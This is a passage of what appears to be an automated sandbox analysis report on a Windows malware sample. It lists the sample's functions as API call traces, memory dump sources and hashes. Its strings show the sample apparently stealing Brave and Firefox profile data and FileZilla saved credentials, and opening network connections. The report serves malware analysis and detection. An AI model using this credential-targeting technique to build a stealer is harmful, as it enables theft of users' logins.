                                    • StrCmpCA.SHLWAPI(?,Preferences), ref: 000AE0E7
                                    • lstrcpy.KERNEL32(00000000,000CCFEC), ref: 000AE11F
                                    • lstrlen.KERNEL32(00E6CDB8), ref: 000AE12E
                                    • lstrcpy.KERNEL32(00000000,?), ref: 000AE155
                                    • lstrcat.KERNEL32(00000000,?), ref: 000AE15D
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000AE19F
                                    • lstrcat.KERNEL32(00000000), ref: 000AE1A9
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000AE1D0
                                    • CopyFileA.KERNEL32(00000000,?,00000001), ref: 000AE1F9
                                    • lstrcpy.KERNEL32(00000000,000CCFEC), ref: 000AE22F
                                    • lstrlen.KERNEL32(00E68980), ref: 000AE23D
                                    • lstrcpy.KERNEL32(00000000,?), ref: 000AE261
                                    • lstrcat.KERNEL32(00000000,00E68980), ref: 000AE269
                                    • FindNextFileA.KERNEL32(00000000,?), ref: 000AE988
                                    • FindClose.KERNEL32(00000000), ref: 000AE997
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2178508766.00000000000A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true
                                    • Associated: 00000000.00000002.2178487120.00000000000A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.00000000000D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.000000000012E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.0000000000136000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.000000000014F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.00000000002D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178678222.00000000002EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.00000000002EC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.0000000000588000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.000000000058F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178969166.000000000059F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2179090804.0000000000741000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2179106980.0000000000742000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_a0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy$lstrcat$lstrlen$FileFind$CloseCopyFirstNext
                                    • String ID: Brave$Preferences$\Brave\Preferences
                                    • API String ID: 1346089424-1230934161
                                    • Opcode ID: 97bd2f494c50cd283b908c32e81539b3fa66e9994580d3e547a715c4beb532e0
                                    • Instruction ID: 7e7fd60988e9bdad6cd9003b15f68426037b4c9f1514e9fbadf7fd96c5fee547
                                    • Opcode Fuzzy Hash: 97bd2f494c50cd283b908c32e81539b3fa66e9994580d3e547a715c4beb532e0
                                    • Instruction Fuzzy Hash: 8B528071E112169FCB61EFE8EC89AEE77F9AF55700F044029F84A97662DB34DC418B90
                                    Function 000A60D0 Relevance: 121.6, APIs: 66, Strings: 3, Instructions: 818stringnetworkCOMMON
                                    Download Yara Rule
                                    APIs
                                    • lstrcpy.KERNEL32(00000000,?), ref: 000A60FF
                                    • lstrcpy.KERNEL32(00000000,000CCFEC), ref: 000A6152
                                    • lstrcpy.KERNEL32(00000000,000CCFEC), ref: 000A6185
                                    • lstrcpy.KERNEL32(00000000,000CCFEC), ref: 000A61B5
                                    • lstrcpy.KERNEL32(00000000,000CCFEC), ref: 000A61F0
                                    • lstrcpy.KERNEL32(00000000,000CCFEC), ref: 000A6223
                                    • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 000A6233
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2178508766.00000000000A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true
                                    • Associated: 00000000.00000002.2178487120.00000000000A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.00000000000D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.000000000012E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.0000000000136000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.000000000014F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.00000000002D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178678222.00000000002EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.00000000002EC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.0000000000588000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.000000000058F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178969166.000000000059F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2179090804.0000000000741000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2179106980.0000000000742000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_a0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy$InternetOpen
                                    • String ID: "$------$x
                                    • API String ID: 2041821634-3736061133
                                    • Opcode ID: 320353e9890208cc076e81da20d26d0a7acbfa8e6c66e44cf11a0e779128bf6f
                                    • Instruction ID: d9577308f9886b1a5b96c3d7a0d35eb2d3d59109f7cb1bc7f4285a8bee363787
                                    • Opcode Fuzzy Hash: 320353e9890208cc076e81da20d26d0a7acbfa8e6c66e44cf11a0e779128bf6f
                                    • Instruction Fuzzy Hash: 5C524C31E112169BDB21EBF8EC49BEE77B9AF15700F184029F805AB252DB35DD428B91
                                    Function 000B6B79 Relevance: 110.8, APIs: 54, Strings: 9, Instructions: 536stringmemoryencryptionCOMMON
                                    Download Yara Rule
                                    APIs
                                    • lstrcpy.KERNEL32(00000000,000CCFEC), ref: 000B6B9D
                                    • lstrcpy.KERNEL32(00000000,000CCFEC), ref: 000B6BCD
                                    • lstrcpy.KERNEL32(00000000,000CCFEC), ref: 000B6BFD
                                    • lstrcpy.KERNEL32(00000000,000CCFEC), ref: 000B6C2F
                                    • GetProcessHeap.KERNEL32(00000000,000F423F), ref: 000B6C3C
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 000B6C43
                                    • StrStrA.SHLWAPI(00000000,<Host>), ref: 000B6C5A
                                    • lstrlen.KERNEL32(00000000), ref: 000B6C65
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000B6CA8
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000B6CCF
                                    • StrStrA.SHLWAPI(00000000,<Port>), ref: 000B6CE2
                                    • lstrlen.KERNEL32(00000000), ref: 000B6CED
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000B6D30
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000B6D57
                                    • StrStrA.SHLWAPI(00000000,<User>), ref: 000B6D6A
                                    • lstrlen.KERNEL32(00000000), ref: 000B6D75
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000B6DB8
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000B6DDF
                                    • StrStrA.SHLWAPI(00000000,<Pass encoding="base64">), ref: 000B6DF2
                                    • lstrlen.KERNEL32(00000000), ref: 000B6E01
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000B6E49
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000B6E71
                                    • CryptStringToBinaryA.CRYPT32(00000000,00000000,00000001,00000000,?,00000000,00000000), ref: 000B6E94
                                    • LocalAlloc.KERNEL32(00000040,00000000), ref: 000B6EA8
                                    • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00000000,00000000,00000000), ref: 000B6EC9
                                    • LocalFree.KERNEL32(00000000), ref: 000B6ED4
                                    • lstrlen.KERNEL32(?), ref: 000B6F6E
                                    • lstrlen.KERNEL32(?), ref: 000B6F81
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2178508766.00000000000A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true
                                    • Associated: 00000000.00000002.2178487120.00000000000A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.00000000000D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.000000000012E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.0000000000136000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.000000000014F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.00000000002D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178678222.00000000002EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.00000000002EC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.0000000000588000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.000000000058F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178969166.000000000059F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2179090804.0000000000741000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2179106980.0000000000742000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_a0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy$lstrlen$BinaryCryptHeapLocalString$AllocAllocateFreeProcess
                                    • String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$browser: FileZilla$login: $password: $profile: null$url:
                                    • API String ID: 2641759534-2314656281
                                    • Opcode ID: b6f62b96335b1025b0873a4a7cef91a8f7d959152f711206d6ccb23a2982f142
                                    • Instruction ID: fbd56bfafb1609e2ee53795d5c8ba9d8b7e4c8788b27793b13c3ae417bae2a5f
                                    • Opcode Fuzzy Hash: b6f62b96335b1025b0873a4a7cef91a8f7d959152f711206d6ccb23a2982f142
                                    • Instruction Fuzzy Hash: 98026C30E11215AFDB11EBB8EC49EEE7BB9AF55700F144429F906EB252DB34DD418B60
                                    Function 000B4B10 Relevance: 79.8, APIs: 44, Strings: 1, Instructions: 1095stringfileCOMMON
                                    Download Yara Rule
                                    APIs
                                    • lstrcpy.KERNEL32(00000000,000CCFEC), ref: 000B4B51
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000B4B74
                                    • lstrcat.KERNEL32(00000000,00000000), ref: 000B4B7F
                                    • lstrlen.KERNEL32(000D4CA8), ref: 000B4B8A
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000B4BA7
                                    • lstrcat.KERNEL32(00000000,000D4CA8), ref: 000B4BB3
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000B4BDE
                                    • FindFirstFileA.KERNEL32(00000000,?), ref: 000B4BFA
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2178508766.00000000000A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true
                                    • Associated: 00000000.00000002.2178487120.00000000000A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.00000000000D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.000000000012E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.0000000000136000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.000000000014F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.00000000002D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178678222.00000000002EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.00000000002EC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.0000000000588000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.000000000058F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178969166.000000000059F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2179090804.0000000000741000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2179106980.0000000000742000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_a0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy$lstrcat$FileFindFirstlstrlen
                                    • String ID: prefs.js
                                    • API String ID: 2567437900-3783873740
                                    • Opcode ID: 9d179ac59f28258a361bb76bd3246109d05dab1ff4bd623b1f98f019695eac0b
                                    • Instruction ID: 3b090390f33d7a6bd9a847703576432ee8027a0122b0d6fe44dfcb0ba5eefcc6
                                    • Opcode Fuzzy Hash: 9d179ac59f28258a361bb76bd3246109d05dab1ff4bd623b1f98f019695eac0b
                                    • Instruction Fuzzy Hash: 0C926030A126118FDB64DF29D948BAAB7F5BF45715F1980ADE809DB3A2D731DC82CB40
                                    Function 000B1250 Relevance: 62.0, APIs: 41, Instructions: 525stringfileCOMMON
                                    Download Yara Rule
                                    APIs
                                    • lstrcpy.KERNEL32(00000000,000CCFEC), ref: 000B1291
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000B12B4
                                    • lstrcat.KERNEL32(00000000,00000000), ref: 000B12BF
                                    • lstrlen.KERNEL32(000D4CA8), ref: 000B12CA
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000B12E7
                                    • lstrcat.KERNEL32(00000000,000D4CA8), ref: 000B12F3
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000B131E
                                    • FindFirstFileA.KERNEL32(00000000,?), ref: 000B133A
                                    • StrCmpCA.SHLWAPI(?,000D17A0), ref: 000B135C
                                    • StrCmpCA.SHLWAPI(?,000D17A4), ref: 000B1376
                                    • lstrcpy.KERNEL32(00000000,000CCFEC), ref: 000B13AF
                                    • lstrcpy.KERNEL32(00000000,?), ref: 000B13D7
                                    • lstrcat.KERNEL32(00000000,00000000), ref: 000B13E2
                                    • lstrlen.KERNEL32(000D1794), ref: 000B13ED
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000B140A
                                    • lstrcat.KERNEL32(00000000,000D1794), ref: 000B1416
                                    • lstrlen.KERNEL32(?), ref: 000B1423
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000B1443
                                    • lstrcat.KERNEL32(00000000,?), ref: 000B1451
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000B147A
                                    • StrCmpCA.SHLWAPI(?,00E6CD58), ref: 000B14A3
                                    • lstrcpy.KERNEL32(00000000,?), ref: 000B14E4
                                    • lstrcpy.KERNEL32(00000000,?), ref: 000B150D
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000B1535
                                    • StrCmpCA.SHLWAPI(?,00E6D3A8), ref: 000B1552
                                    • lstrcpy.KERNEL32(00000000,?), ref: 000B1593
                                    • lstrcpy.KERNEL32(00000000,?), ref: 000B15BC
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000B15E4
                                    • StrCmpCA.SHLWAPI(?,00E6CD10), ref: 000B1602
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000B1633
                                    • lstrcpy.KERNEL32(00000000,?), ref: 000B165C
                                    • lstrcpy.KERNEL32(00000000,?), ref: 000B1685
                                    • StrCmpCA.SHLWAPI(?,00E6CE00), ref: 000B16B3
                                    • lstrcpy.KERNEL32(00000000,?), ref: 000B16F4
                                    • lstrcpy.KERNEL32(00000000,?), ref: 000B171D
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000B1745
                                    • lstrcpy.KERNEL32(00000000,?), ref: 000B1796
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000B17BE
                                    • lstrcpy.KERNEL32(00000000,?), ref: 000B17F5
                                    • FindNextFileA.KERNEL32(00000000,?), ref: 000B181C
                                    • FindClose.KERNEL32(00000000), ref: 000B182B
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2178508766.00000000000A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true
                                    • Associated: 00000000.00000002.2178487120.00000000000A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.00000000000D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.000000000012E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.0000000000136000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.000000000014F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.00000000002D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178678222.00000000002EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.00000000002EC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.0000000000588000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.000000000058F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178969166.000000000059F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2179090804.0000000000741000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2179106980.0000000000742000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_a0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy$lstrcat$Findlstrlen$File$CloseFirstNext
                                    • String ID:
                                    • API String ID: 1346933759-0
                                    • Opcode ID: ba80b283abd8fb7ea72e9081a346f649f99ade2b879702d6a7cd0e27dcb052ac
                                    • Instruction ID: 11540c156ec9a5e4ef031a1f83bae615c38d0f7b51821eec834928b9a9cecb45
                                    • Opcode Fuzzy Hash: ba80b283abd8fb7ea72e9081a346f649f99ade2b879702d6a7cd0e27dcb052ac
                                    • Instruction Fuzzy Hash: ED129E71A112069BCB24EFB8E899AEF77F8AF44700F444529F88AD7651EF30DC458B91
                                    Function 000BCBE0 Relevance: 54.6, APIs: 27, Strings: 4, Instructions: 310filestringCOMMON
                                    Download Yara Rule
                                    APIs
                                    • wsprintfA.USER32 ref: 000BCBFC
                                    • FindFirstFileA.KERNEL32(?,?), ref: 000BCC13
                                    • lstrcat.KERNEL32(?,?), ref: 000BCC5F
                                    • StrCmpCA.SHLWAPI(?,000D17A0), ref: 000BCC71
                                    • StrCmpCA.SHLWAPI(?,000D17A4), ref: 000BCC8B
                                    • wsprintfA.USER32 ref: 000BCCB0
                                    • PathMatchSpecA.SHLWAPI(?,00E689C0), ref: 000BCCE2
                                    • CoInitialize.OLE32(00000000), ref: 000BCCEE
                                      • Part of subcall function 000BCAE0: CoCreateInstance.COMBASE(000CB110,00000000,00000001,000CB100,?), ref: 000BCB06
                                      • Part of subcall function 000BCAE0: MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,000000FF,?,00000104), ref: 000BCB46
                                      • Part of subcall function 000BCAE0: lstrcpyn.KERNEL32(?,?,00000104), ref: 000BCBC9
                                    • CoUninitialize.COMBASE ref: 000BCD09
                                    • lstrcat.KERNEL32(?,?), ref: 000BCD2E
                                    • lstrlen.KERNEL32(?), ref: 000BCD3B
                                    • StrCmpCA.SHLWAPI(?,000CCFEC), ref: 000BCD55
                                    • wsprintfA.USER32 ref: 000BCD7D
                                    • wsprintfA.USER32 ref: 000BCD9C
                                    • PathMatchSpecA.SHLWAPI(?,?), ref: 000BCDB0
                                    • wsprintfA.USER32 ref: 000BCDD8
                                    • CopyFileA.KERNEL32(?,?,00000001), ref: 000BCDF1
                                    • CreateFileA.KERNEL32(?,80000000,00000003,00000000,00000003,00000080,00000000), ref: 000BCE10
                                    • GetFileSizeEx.KERNEL32(00000000,?), ref: 000BCE28
                                    • CloseHandle.KERNEL32(00000000), ref: 000BCE33
                                    • CloseHandle.KERNEL32(00000000), ref: 000BCE3F
                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 000BCE54
                                    • lstrcpy.KERNEL32(00000000,?), ref: 000BCE94
                                    • FindNextFileA.KERNEL32(?,?), ref: 000BCF8D
                                    • FindClose.KERNEL32(?), ref: 000BCF9F
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2178508766.00000000000A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true
                                    • Associated: 00000000.00000002.2178487120.00000000000A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.00000000000D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.000000000012E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.0000000000136000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.000000000014F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.00000000002D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178678222.00000000002EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.00000000002EC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.0000000000588000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.000000000058F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178969166.000000000059F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2179090804.0000000000741000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2179106980.0000000000742000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_a0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Filewsprintf$CloseFind$CreateHandleMatchPathSpeclstrcat$ByteCharCopyFirstInitializeInstanceMultiNextSizeUninitializeUnothrow_t@std@@@Wide__ehfuncinfo$??2@lstrcpylstrcpynlstrlen
                                    • String ID: %s%s$%s\%s$%s\%s\%s$%s\*
                                    • API String ID: 3860919712-2388001722
                                    • Opcode ID: c86451223aada1c8ecec64b96fd274818947ea94d513d2fc38933df7849456ef
                                    • Instruction ID: 568a2dabd5adc3d9bf3c085ef495a8c9b33573f0d013efaca824b0c09f0f026e
                                    • Opcode Fuzzy Hash: c86451223aada1c8ecec64b96fd274818947ea94d513d2fc38933df7849456ef
                                    • Instruction Fuzzy Hash: F6C16271A01219AFDB64DF64EC49EEE77B9FF54300F0445A9F509A7291EA30AE84CF60
                                    Function 000B1269 Relevance: 43.8, APIs: 29, Instructions: 336stringfileCOMMON
                                    Download Yara Rule
                                    APIs
                                    • lstrcpy.KERNEL32(00000000,000CCFEC), ref: 000B1291
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000B12B4
                                    • lstrcat.KERNEL32(00000000,00000000), ref: 000B12BF
                                    • lstrlen.KERNEL32(000D4CA8), ref: 000B12CA
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000B12E7
                                    • lstrcat.KERNEL32(00000000,000D4CA8), ref: 000B12F3
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000B131E
                                    • FindFirstFileA.KERNEL32(00000000,?), ref: 000B133A
                                    • StrCmpCA.SHLWAPI(?,000D17A0), ref: 000B135C
                                    • StrCmpCA.SHLWAPI(?,000D17A4), ref: 000B1376
                                    • lstrcpy.KERNEL32(00000000,000CCFEC), ref: 000B13AF
                                    • lstrcpy.KERNEL32(00000000,?), ref: 000B13D7
                                    • lstrcat.KERNEL32(00000000,00000000), ref: 000B13E2
                                    • lstrlen.KERNEL32(000D1794), ref: 000B13ED
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000B140A
                                    • lstrcat.KERNEL32(00000000,000D1794), ref: 000B1416
                                    • lstrlen.KERNEL32(?), ref: 000B1423
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000B1443
                                    • lstrcat.KERNEL32(00000000,?), ref: 000B1451
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000B147A
                                    • StrCmpCA.SHLWAPI(?,00E6CD58), ref: 000B14A3
                                    • lstrcpy.KERNEL32(00000000,?), ref: 000B14E4
                                    • lstrcpy.KERNEL32(00000000,?), ref: 000B150D
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000B1535
                                    • StrCmpCA.SHLWAPI(?,00E6D3A8), ref: 000B1552
                                    • lstrcpy.KERNEL32(00000000,?), ref: 000B1593
                                    • lstrcpy.KERNEL32(00000000,?), ref: 000B15BC
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000B15E4
                                    • lstrcpy.KERNEL32(00000000,?), ref: 000B1796
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 000B17BE
                                    • lstrcpy.KERNEL32(00000000,?), ref: 000B17F5
                                    • FindNextFileA.KERNEL32(00000000,?), ref: 000B181C
                                    • FindClose.KERNEL32(00000000), ref: 000B182B
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2178508766.00000000000A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true
                                    • Associated: 00000000.00000002.2178487120.00000000000A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.00000000000D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.000000000012E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.0000000000136000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.000000000014F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178508766.00000000002D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178678222.00000000002EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.00000000002EC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2178694219.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
